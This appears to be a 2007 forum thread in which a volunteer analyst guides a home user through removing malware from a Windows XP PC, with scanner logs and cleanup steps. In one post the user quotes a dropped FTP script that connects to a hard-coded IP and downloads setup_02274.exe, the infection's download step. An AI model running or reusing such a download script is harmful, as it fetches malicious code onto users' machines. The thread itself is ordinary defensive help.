cul8rman Registered User Join Date: Aug 2006 Location: Arizona Posts: 134 OS: XP	Re: MS Windows XP will not load when connected to internet Color is back so I have separated the posts with a color line of the process run. Avenger.txt file Logfile of The Avenger version 1, by Swandog46 Running from registry key: \Registry\Machine\System\CurrentControlSet\Services\tkxembmv ***************** Script file located at: \??\C:\Program Files\lerfqbyh.txt Script file opened successfully. Script file read successfully Backups directory opened successfully at C:\Avenger *************** Beginning to process script file: Registry key \Registry\Machine\System\CurrentControlSet\Services\C:\WINDOWS\System32\ntio256.sys not found! Unload of driver C:\WINDOWS\System32\ntio256.sys failed! Could not process line: C:\WINDOWS\System32\ntio256.sys Status: 0xc0000034 File C:\WINDOWS\System32\ntio256.sys not found! Deletion of file C:\WINDOWS\System32\ntio256.sys failed! Could not process line: C:\WINDOWS\System32\ntio256.sys Status: 0xc0000034 Completed script processing. ***************** Finished! Terminate. - - - - - - - - - - - - - - - - Results of Report.txt SDFix: Version 1.69 Run by Duane - Tue 03/20/2007 @ 20:25:26.98 Microsoft Windows XP [Version 5.1.2600] Running From: C:\Documents and Settings\Duane\Desktop\SDFix Safe Mode: Checking Services: Restoring Windows Registry Entries Restoring Default Hosts File Rebooting... Normal Mode: Checking Files: Below files will be copied to Backups folder then removed: C:\WINDOWS\system32\i - Deleted C:\WINDOWS\system32\setup_63032.exe - Deleted ADS Check: C:\WINDOWS\system32 No streams found. Final Check: Remaining Services: ------------------ Authorized Application Key Export: [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List] "%windir%\\system32\\sessmgr.exe"="%windir%\\system32\\sessmgr.exe::enabled:@xpsp2res.dll,-22019" [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\DomainProfile\AuthorizedApplications\List] "%windir%\\system32\\sessmgr.exe"="%windir%\\system32\\sessmgr.exe::enabled:@xpsp2res.dll,-22019" Remaining Files: --------------- Backups Folder: - C:\DOCUME~1\Duane\Desktop\SDFix\backups\backups.zip Checking For Files with Hidden Attributes : C:\Program Files\Common Files\aolshare\shell\us\shellext.dll C:\Program Files\Common Files\csshare\shell\us\shellext.dll C:\My Games\Action Ball\actionball.exe C:\My Games\Adventure Ball\AdventureBall.exe C:\My Games\Aqua Pearls\pearls.exe C:\My Games\Cactus Bruce and the Corporate Monkeys\RealCB12.exe C:\My Games\Clash 'N Slash\Clash N Slash.exe C:\My Games\Flying Leo\FlyingLeo.exe C:\My Games\Icy Spell\IcySpell.exe C:\My Games\Impact\Impact.exe C:\My Games\Inspheration\Inspheration.exe C:\My Games\Jewel of Atlantis\Jewel of Atlantis.exe C:\My Games\Mirror Magic\mirrormagic.exe C:\My Games\Mosaic - Tomb of Mystery\Mosaic.exe C:\My Games\Phlinx to Go\PhlinxToGo.exe C:\My Games\Rainbow Web\RainbowWeb.exe C:\My Games\Snowy - Space Trip\SpaceTrip.exe C:\My Games\Turtle Odyssey\Game.exe C:\My Games\Wheel of Fortune\Wheel of Fortune.exe C:\Program Files\America Online 8.0\aolphx.exe C:\Program Files\America Online 8.0\aoltray.exe C:\Program Files\America Online 8.0\RBM.exe C:\Program Files\America Online 8.0\waol.exe C:\Program Files\America Online 8.0\COMIT\cswitch.exe C:\Program Files\CompuServe 7.0\csphx.exe C:\Program Files\CompuServe 7.0\cstray.exe C:\Program Files\CompuServe 7.0\RBM.exe C:\Program Files\CompuServe 7.0\wcs2000.exe C:\Program Files\CompuServe 7.0\COMIT\cswitch.exe C:\Program Files\Picasa2\setup.exe C:\WINDOWS\system32\config\system.tmp.LOG Add/Remove Programs List: 1Click DVD Copy 4.2.9.2 3D Snowy Cottage Screen Saver Ad-Aware SE Personal Adobe Acrobat 4.0 Agfa ePhoto CL18 Digital Camera Driver America Online AOL Instant Messenger (SM) AOL Coach Version 1.0(Build:20020823.1) AVG 7.5 AVG Anti-Spyware 7.5 BadCopy Pro Belarc Advisor 7.0 BigFix Calm Before the Storm Screen Saver Chess Live 4.2 Cinema Tycoon(TM) Gold CleanUp! Conexant SoftK56 Modem(M) CompuServe Codec Pack - All In 1 6.0.2.7 Cox Online Support Controls EPSON Printer Software EZBack-it-up 2.0.1 Fiber Twig 2: Restoration of Magic Garden Fish Tycoon Fortune Tiles(TM) Gold FREE Hi-Q Recorder 1.9 Gem Shop Google Desktop Search Gum Droppers Hexalot High Flying Act - Interactive Storybook HijackThis 1.99.1 ICQ iTunes Karu Microsoft Data Access Components KB870669 Lavasoft VX2 Cleaner LEGO Chess Macromedia Shockwave Player CloneDVD 4.0 Micro Innovations Wireless Keyboard Micro Innovations Wireless Optical Mouse Mozilla Firefox (2.0.0.3) MSN Music Assistant Netscape 6 (6.2.1) Panda ActiveScan PC Pitstop Optimize 1.5 Picasa 2 QuickTime Reader Rabbit 1st Grade Reader Rabbit 1st Grade(R) Capers on Cloud Nine!(TM) Reader Rabbit Thinking Adventures Ages 4-6 Reader Rabbit(R) I Can Read! With Phonics RealArcade RealPlayer RegistryFix v3.0 Reader Rabbit's 2nd Grade Sandlot Games Client Services Macromedia Flash Player 8 SimCity 3000 Splash Spybot - Search & Destroy 1.4 IncBack + SurferNETWORK Player SyncBackSE Viewpoint Media Player (Remove Only) WeatherBug Winamp (remove only) Yahoo! Toolbar Yahoo! Toolbar Zulu Gems Microsoft Money 2003 Microsoft Money 2003 System Pack PC Inspector File Recovery The Sims Deluxe Edition Norton WMI Update Google Toolbar for Internet Explorer Java(TM) SE Runtime Environment 6 DataRobot Premium Stomp Backup MyPC MaxBlast 4 PowerDVD Windows Backup Utility EPSON Web-To-Page Mirror Magic NetZero For Riverdeep iTunes Intel(R) Extreme Graphics Driver Microsoft Office Excel Viewer 2003 Microsoft Office Word Viewer 2003 Adobe Reader 7.0.7 DV 4100M HP Software Update Ulead Photo Express 4.0 SE Texas Hold 'Em: High Stakes Poker Ulead Photo Explorer 8.0 SE Basic Disney's Phonics Quest Greeting Card Factory Express Sygate Personal Firewall Microsoft Works 6.0 HP Deskjet 3740 Realtek AC'97 Audio Multimedia Keyboard Driver Finished ------------------------------------------ Results of ComboFix.txt "Duane" - 07-03-20 21:24:36 Service Pack 1 ComboFix 07-03-15.2 - Running from: "C:\Documents and Settings\Duane\Desktop" ((((((((((((((((((((((((((((((( Files Created from 2007-02-20 to 2007-03-20 )))))))))))))))))))))))))))))))))) 2007-03-20 20:18 <DIR> d-------- C:\avenger 2007-03-19 21:14 <DIR> d--h----- C:\WINDOWS\PIF 2007-03-18 12:06 552 --a------ C:\Combo.bat 2007-03-18 09:51 77 --a------ C:\delete.reg 2007-03-18 09:40 51,955,192 --a------ C:\regedit 3.18.07.reg 2007-03-17 23:47 51,951,606 --a------ C:\Regedit 3.172.07.reg 2007-03-17 09:39 51,944,564 --a------ C:\regedit 3.17.07.reg 2007-03-13 20:51 136 --a------ C:\WINDOWS\system32\dgjun.bat 2007-03-13 19:32 51,995,858 --a------ C:\Regedit 3.13.07.reg 2007-03-12 18:20 491,768 --a------ C:\ie6setup.exe 2007-03-11 22:17 <DIR> d-------- C:\WINDOWS\system32\ActiveScan 2007-03-11 09:25 <DIR> d-------- C:\Program Files\Java 2007-03-11 09:25 <DIR> d-------- C:\Program Files\Common Files\Java 2007-03-11 09:24 <DIR> d-------- C:\DOCUME~1\Duane\APPLIC~1\Sun 2007-03-10 11:31 <DIR> d-------- C:\Rustbfix 2007-03-08 19:33 971 --a------ C:\DOCUME~1\Duane\Purity.bat 2007-03-08 19:33 8,192 --a------ C:\DOCUME~1\Duane\RestartIt.exe 2007-03-08 19:33 79,360 --a------ C:\DOCUME~1\Duane\swxcacls.exe 2007-03-08 19:33 73,728 --a------ C:\DOCUME~1\Duane\FDSV.EXE 2007-03-08 19:33 6,914 --a------ C:\DOCUME~1\Duane\Qoo.bat 2007-03-08 19:33 51,200 --a------ C:\DOCUME~1\Duane\dumphive.exe 2007-03-08 19:33 5,074 --a------ C:\DOCUME~1\Duane\NTPBack.exe 2007-03-08 19:33 49,152 --a------ C:\DOCUME~1\Duane\vfind.exe 2007-03-08 19:33 42,887 --a------ C:\DOCUME~1\Duane\ntp.exe 2007-03-08 19:33 39,184 --a------ C:\DOCUME~1\Duane\Ntrights.exe 2007-03-08 19:33 38,400 --a------ C:\DOCUME~1\Duane\moveex.exe 2007-03-08 19:33 319,415 --a------ C:\DOCUME~1\Duane\Creg.reg 2007-03-08 19:33 28,672 --a------ C:\DOCUME~1\Duane\catchme.exe 2007-03-08 19:33 26,112 --a------ C:\DOCUME~1\Duane\nircmd.exe 2007-03-08 19:33 2,304 --a------ C:\DOCUME~1\Duane\Look2Me.bat 2007-03-08 19:33 181,776 --a------ C:\DOCUME~1\Duane\handle.exe 2007-03-08 19:33 140,800 --a------ C:\DOCUME~1\Duane\swreg.exe 2007-03-08 19:33 123,904 --a------ C:\DOCUME~1\Duane\swsc.exe 2007-03-08 19:33 117,379 --a------ C:\DOCUME~1\Duane\LIST-C.bat 2007-02-24 21:33 53,248 --a------ C:\WINDOWS\system32\Process.exe 2007-02-24 21:33 <DIR> d-------- C:\SmitfraudFix 2007-02-21 21:42 129 --a------ C:\fix.bat 2007-02-20 23:22 <DIR> d-------- C:\Program Files\backups (((((((((((((((((((((((((((((((((((((((((((((((( Find3M Report ))))))))))))))))))))))))))))))))))))))))))))))))))))) 2007-03-19 21:58 -------- d-------- C:\Program Files\hijack this 2007-03-18 10:52 -------- d-------- C:\Program Files\picasa2 2007-03-18 10:50 -------- d-------- C:\Program Files\messenger 2007-03-18 10:45 -------- d-------- C:\Program Files\itunes 2007-03-18 10:44 -------- d-------- C:\Program Files\google 2007-03-08 19:47 -------- d-------- C:\Program Files\Common Files\symantec shared 2007-02-24 22:08 3762 --a------ C:\WINDOWS\system32\tmp.reg 2007-02-20 21:14 -------- d-------- C:\Program Files\shockwave.com 2007-02-10 20:00 14201 --a------ C:\Program Files\hijackthis.log 2007-01-28 22:13 -------- d-------- C:\Program Files\lg software innovations 2007-01-28 22:05 -------- d-------- C:\Program Files\clonedvd 2007-01-28 21:28 14 --a------ C:\WINDOWS\system32\systeminfo3.dll 2007-01-28 21:26 81920 --a------ C:\DOCUME~1\Duane\APPLIC~1\ezpinst.exe 2007-01-28 21:26 7176 --a------ C:\DOCUME~1\Duane\APPLIC~1\pcouffin.cat 2007-01-28 21:26 47360 --a------ C:\WINDOWS\system32\drivers\pcouffin.sys 2007-01-28 21:26 47360 --a------ C:\DOCUME~1\Duane\APPLIC~1\pcouffin.sys 2007-01-28 21:26 34 --a------ C:\DOCUME~1\Duane\APPLIC~1\pcouffin.log 2007-01-28 21:26 1144 --a------ C:\DOCUME~1\Duane\APPLIC~1\pcouffin.inf 2007-01-28 21:26 -------- d-------- C:\DOCUME~1\Duane\APPLIC~1\vso 2007-01-21 15:19 -------- d-------- C:\Program Files\lavasoft 2007-01-21 15:19 -------- d-------- C:\DOCUME~1\Duane\APPLIC~1\lavasoft 2007-01-21 15:08 14612 --a------ C:\Program Files\cwshredder.exe-2d092fd4.pf 2007-01-21 15:03 532480 --a------ C:\Program Files\cwshredder.exe 2007-01-12 18:19 0 --a------ C:\WINDOWS\system32\vb2en16.dll 2007-01-11 16:35 12800 --a------ C:\WINDOWS\system32\svchost.exe 2007-01-07 18:21 1 --a------ C:\WINDOWS\system32\ps.dat 2007-01-07 18:21 1 --a------ C:\WINDOWS\system32\cookie.dat 2007-01-07 13:16 25600 --a------ C:\WINDOWS\system32\helper.dll 2007-01-04 22:35 10660 --a------ C:\WINDOWS\mozver.dat 2007-01-03 20:49 5037072 --a------ C:\Program Files\spybotsd14.exe 2007-01-01 12:02 507 --a------ C:\WINDOWS\ereg077.dat 2006-12-25 16:33 23066 --a------ C:\Program Files\plainoldfavorites-0.5.6-fx-windows.xpi (((((((((((((((((((((((((((((((((((((((((( Reg Loading Points )))))))))))))))))))))))))))))))))))))))))))))))) Note empty entries & legit default entries are not shown [HKEY_CURRENT_USER\software\microsoft\windows\currentversion\run] "MSMSGS"="\"C:\\Program Files\\Messenger\\msmsgs.exe\" /background" "Microsoft Works Update Detection"="c:\\Program Files\\Microsoft Works\\WkDetect.exe" "swg"="C:\\Program Files\\Google\\GoogleToolbarNotifier\\1.2.1128.5462\\GoogleToolbarNotifier.exe" [HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\run] "TkBellExe"="\"C:\\Program Files\\Common Files\\Real\\Update_OB\\realsched.exe\" -osboot" "SSC_UserPrompt"="C:\\Program Files\\Common Files\\Symantec Shared\\Security Center\\UsrPrmpt.exe" "Ulead AutoDetector"="C:\\Program Files\\Ulead Systems\\Ulead Photo Explorer 8.0 SE Basic\\Monitor.exe" "HPDJ Taskbar Utility"="C:\\WINDOWS\\System32\\spool\\drivers\\w32x86\\3\\hpztsb10.exe" "HP Component Manager"="\"C:\\Program Files\\HP\\hpcoretech\\hpcmpmgr.exe\"" "HP Software Update"="\"C:\\Program Files\\Hewlett-Packard\\HP Software Update\\HPWuSchd2.exe\"" "QuickTime Task"="\"C:\\Program Files\\QuickTime\\qttask.exe\" -atboottime" "Picasa Media Detector"="C:\\Program Files\\Picasa2\\PicasaMediaDetector.exe" "iTunesHelper"="\"C:\\Program Files\\iTunes\\iTunesHelper.exe\"" "AVG7_CC"="C:\\PROGRA~1\\Grisoft\\AVG7\\avgcc.exe /STARTUP" "OFFICEKB"="C:\\Program Files\\Micro Innovations\\Keyboard\\kbdap32a.EXE" "FLMOFFICE4DMOUSE"="C:\\Program Files\\Micro Innovations\\Mouse\\mouse32a.exe" "PC Pitstop Optimize Scheduler"="C:\\Program Files\\PCPitstop\\Optimize\\PCPOptimize.exe -boot" "SmcService"="C:\\PROGRA~1\\Sygate\\SPF\\smc.exe -startgui" "SunJavaUpdateSched"="\"C:\\Program Files\\Java\\jre1.6.0\\bin\\jusched.exe\"" [HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\run\OptionalComponents] [HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\run\OptionalComponents\IMAIL] "Installed"="1" [HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\run\OptionalComponents\MAPI] "Installed"="1" "NoChange"="1" [HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\run\OptionalComponents\MSFS] "Installed"="1" [HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\explorer\shellexecutehooks] "{57B86673-276A-48B2-BAE7-C6DBB3020EB8}"="AVG Anti-Spyware 7.5" [HKEY_LOCAL_MACHINE\system\currentcontrolset\control\securityproviders] "SecurityProviders"="msapsspc.dll, schannel.dll, digest.dll, msnsspc.dll" [HKEY_LOCAL_MACHINE\software\Microsoft\Windows NT\CurrentVersion\Svchost] LocalService REG_MULTI_SZ Alerter\0WebClient\0LmHosts\0RemoteRegistry\0upnphost\0SSDPSRV\0\0 NetworkService REG_MULTI_SZ DnsCache\0\0 rpcss REG_MULTI_SZ RpcSs\0\0 imgsvc REG_MULTI_SZ StiSvc\0\0 termsvcs REG_MULTI_SZ TermService\0\0 ****************************************************************** catchme 0.2 W2K/XP/Vista - userland rootkit detector by Gmer, 17 October 2006 http://www.gmer.net scanning hidden processes ... scanning hidden services ... scanning hidden autostart entries ... scanning hidden files ... scan completed successfully hidden processes: 0 hidden services: 0 hidden files: 0 ****************************************************************** Completion time: 07-03-20 21:26:05 C:\ComboFix2.txt ... 07-03-18 14:48 C:\ComboFix3.txt ... 07-03-18 12:06 --------------------------------------------- I checked the C/Windows/system32 for setup_####.exe files and did not see any. I also did not see the I folder that had been present. AVG has not popped up with any threats. I have not done anything else at this point but will check IE and put that in next post.

03-20-2007, 10:54 PM	#72 (permalink)
cul8rman Registered User Join Date: Aug 2006 Location: Arizona Posts: 134 OS: XP	Re: MS Windows XP will not load when connected to internet IE worked fine along with saving files, I had problems before when selecting a different location in the drop down menu. IE and Firefox load quickly. Did you beat the virus or do I need to check again with Panda? Thanks for your hard work on this and Pancake as well.

03-21-2007, 08:18 AM	#73 (permalink)
Ried Assistant Manager, TSF Academy; Moderator/Analyst Security Team Join Date: Jan 2005 Location: Ohio Posts: 26,808 OS: WinXP and Vista	Re: MS Windows XP will not load when connected to internet I'm a bit leary to say we've erradicated this infection at this point. I'd like to see an online scan and wait a few reboots to see how things develop. Perform an online scan with Internet Explorer with Panda ActiveScan Click on located at the bottom of the page. A "pop up" window will appear. * Please ensure that your pop up blocker doesn't block it * Enter your e-mail address, country, and state & click "Free Online Scan" The download of the 8 MB Panda's ActiveX control will take place Begin the scan by selecting If it finds any malware, it will offer you a report. Please ignore any entry it finds and the offer to buy the program to remove the entry, as we will address this later. Click on then click * You needn't remain online while it's doing the scan but you have to re-connect after it has finished to see the report. * Turn off the real time scanner of any existing antivirus program while performing the online scan -------------------------------------------------------- Also, since you began this thread a new tool has been developed to replace ComboScan. Delete ComboScan.exe and please download the following: Download Deckard's System Scanner (DSS) to your Desktop. What DSS will do: create a new System Restore point in Windows XP and Vista. clean your Temporary Files, Downloaded Program Files, and Internet Cache Files, and also empty the Recycle Bin on all drives. check some important areas of your system and produce a report for your analyst to review. DSS automatically runs HijackThis for you, but it will also install and place a shortcut to HijackThis on your desktop if you do not already have HijackThis installed. Note: You must be logged onto an account with administrator privileges. Close all applications and windows. Double-click on dss.exe to run it, and follow the prompts. When the scan is complete, two text files will open - main.txt <- this one will be maximized and extra.txt <-this one will be minimized Copy (Ctrl+A then Ctrl+C) and paste (Ctrl+V) the contents of main.txt in your thread in the HijackThis Log Help Forum. Please attach extra.txt to your post. To attach a file to a new post, simply Click the[Manage Attachments] button under Additional Options > Attach Files on the post composition page, and copy and paste the following into the "Upload File from your Computer" box: C:\Deckard\System Scanner\extra.txt Click Upload. ----------------------------------------------------- Please include the following in your next reply: Panda results main.txt an attached extra.txt __________________ Member of ASAP since 2005 Member of UNITE since 2006 "It is one life whether we spend it laughing or weeping." "Take the time to laugh--it is the music of the soul."

03-22-2007, 12:00 AM	#75 (permalink)
cul8rman Registered User Join Date: Aug 2006 Location: Arizona Posts: 134 OS: XP	Re: MS Windows XP will not load when connected to internet I looked in C/Windows/System32 for the Setup files and found one =- Setup_02274.exe with a modified date of 3/21/07. I also found a file that had been deleted - "I" and here is the contents open 130.13.240.51 13194 user 1 1 get setup_02274.exe quit I also looked in openopenopen and openopenopenopen and it was a bunch of numbers and characters, but a lot of 3's and letters. I don't know if that is significant. I have a bunch of files that are of type "File" in the system32 folder. I checked my other PC and that type of file does not exist there. I tried doing a screen shot and doing a word doc but the size was too big. Just some things i see, if it helps. Thanks

03-22-2007, 08:26 AM	#76 (permalink)
Ried Assistant Manager, TSF Academy; Moderator/Analyst Security Team Join Date: Jan 2005 Location: Ohio Posts: 26,808 OS: WinXP and Vista	Re: MS Windows XP will not load when connected to internet Good work. I'd like to gather a bit more information. Go to Start>Run and type cmd then press Enter Type the following instruction at the command prompt: dir /s /a "C:\WINDOWS\System32\openopenopenopen" > c:\find.txt & start notepad c:\find.txt You may find it easier to copy/paste it into the command prompt. If you're unfamiliar with this, you can paste into the command prompt by clicking on the upper left icon on the command shell window, referred to as the system menu, and along with Move, Size, and so on, you'll see a sub menu called Edit. Click on that, and you'll find Copy, Paste and other clipboard related commands. Here's a screen shot of what I mean: A notepad file will open. Paste the contents of that file here. ------------------------------------------------ Also, please navigate to the following and tell me what's in these: C:\337100427 C:\WINDOWS\System32\14981 C:\WINDOWS\System32\3D64363D C:\WINDOWS\System32\7AAECFBC C:\WINDOWS\System32\86C67981 C:\WINDOWS\System32\9147A101 C:\WINDOWS\System32\9947BC72 C:\WINDOWS\System32\9ACA5390 C:\WINDOWS\System32\DF21552E __________________ Member of ASAP since 2005 Member of UNITE since 2006 "It is one life whether we spend it laughing or weeping." "Take the time to laugh--it is the music of the soul."

03-22-2007, 11:23 AM	#77 (permalink)
cul8rman Registered User Join Date: Aug 2006 Location: Arizona Posts: 134 OS: XP	Re: MS Windows XP will not load when connected to internet Would you like the entries posted in a reply or attached in a notepad txt file? Do you want them listed altogether like Contents of C:\337100427 blah, blah, C:\WINDOWS\System32\14981 blah, blah, etc... Just a bit of background, I did start out in my younger days as a computer science major but did not like the direction that was going so I ended up getting an accounting degree. I am familar wiht the logic behind how the computer works, but not at all with how Windows works and all the relationships it builds in the DLL files. I checked the directory on my working PC and figured since that one is working fairly good if something is not in that it should not be in the one you are helping me with. My working PC is up to date with SP2 but is running slow. I will work on that one later, this one is enough work for now. I should be able to get this done late tonight but I have to help my son with a school project and he got tickets to the hockey game so I will be getting home late. I will get back to you as soon as I get the file contents exported to the method you choose. Thanks for the help, I better get back to my job or I will have plenty time to take care of the ailing PC.

03-22-2007, 11:41 AM	#78 (permalink)
Ried Assistant Manager, TSF Academy; Moderator/Analyst Security Team Join Date: Jan 2005 Location: Ohio Posts: 26,808 OS: WinXP and Vista	Re: MS Windows XP will not load when connected to internet Now I know why you're such a pleasure to work with on this. However you see fit to provide the info is fine with me. Just do whatever is most convenient for you. I too have a family to tend to and also have plans this evening and may not be able to go over the info until tomorrow. Take your time--enjoy your time with your son--school projects are always fun __________________ Member of ASAP since 2005 Member of UNITE since 2006 "It is one life whether we spend it laughing or weeping." "Take the time to laugh--it is the music of the soul."

03-23-2007, 07:14 PM	#79 (permalink)
cul8rman Registered User Join Date: Aug 2006 Location: Arizona Posts: 134 OS: XP	Re: MS Windows XP will not load when connected to internet Doing everything in Notepad, cntrl A, cntrl C, then cntrl V is easy enough. Each file is separated by *****************, comments ( ) are mine, not what was in the file. ----------------------------------- Contents of Find.txt Volume in drive C has no label. Volume Serial Number is 1417-BE8B Directory of C:\WINDOWS\System32 01/12/2007 06:19 PM 6 openopenopenopen 1 File(s) 6 bytes Total Files Listed: 1 File(s) 6 bytes 0 Dir(s) 74,311,806,976 bytes free Now for the "File" contents ************************************* C:\337100427 ok ************************************ C:\WINDOWS\System32\14981 * (Appears to be a bunch of spaces) ************************************** C:\WINDOWS\System32\3D64363D * (empty) ************************************** C:\WINDOWS\System32\7AAECFBC * (empty) ************************************** C:\WINDOWS\System32\86C67981 * (empty) ************************************** C:\WINDOWS\System32\9147A101 * (empty) ************************************** C:\WINDOWS\System32\9947BC72 * (empty) ************************************** C:\WINDOWS\System32\9ACA5390 * (empty) ************************************** C:\WINDOWS\System32\DF21552E * (empty) **************************************** End of file posts They were all empty except the first one, that had a bunch of spaces. They are all type "File" and the last date modified was January 2007.

03-23-2007, 07:19 PM	#80 (permalink)
cul8rman Registered User Join Date: Aug 2006 Location: Arizona Posts: 134 OS: XP	Re: MS Windows XP will not load when connected to internet Will updating to SP2 help, or do I need to wait until this is resolved? I think the infection may have entered through another user on this, should I be working on that person's area or does the software look at the whole drive? Thanks - BTW, system is running alright so far.